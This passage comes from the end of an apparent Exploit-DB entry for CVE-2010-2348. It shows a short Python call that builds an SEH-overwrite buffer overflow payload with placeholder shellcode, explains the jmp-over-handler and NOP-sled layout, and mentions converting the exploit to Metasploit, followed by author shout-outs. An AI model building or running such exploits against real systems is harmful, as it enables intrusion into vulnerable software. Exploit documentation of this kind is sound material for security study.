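    payload, layout = build_seh_payload(OFFSET_TO_NSEH, PPR_LAME_ENC, PLACEHOLDER_SHELLCODE)
    print("layout:", layout, "total:", len(payload), "bytes")
```

The `jmp short +6` is the reason the NOP sled directly follows the SEH slot: after pop/pop/ret returns into nSEH, execution hops over the handler address and lands on the sled. When converting to a Metasploit module the same three values (offset, handler address, bad characters) are what go into the target table.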

EDB-ID: 13909
CVE: CVE-2010-2348
OSVDB-ID: 65639
Published: 2010-06-17
Maybe sometime, if I get the chance, I'll write up how it was built, and also (again, if I get the chance) how to convert it to Metasploit, how to fuzz, exploiting a direct RET condition, abusing SEH to gain EIP, and bypassing ASLR and DEP on the newest Windows versions.

Special thanks to..

Oebaj – thanks Pak, I would never have turned out "like this" if you hadn't told me to take offsec 😉
Otoy – you got it too bro, awesome!
Kilurah – when are you going to continue again?!
slashr00t – keep it up, friends!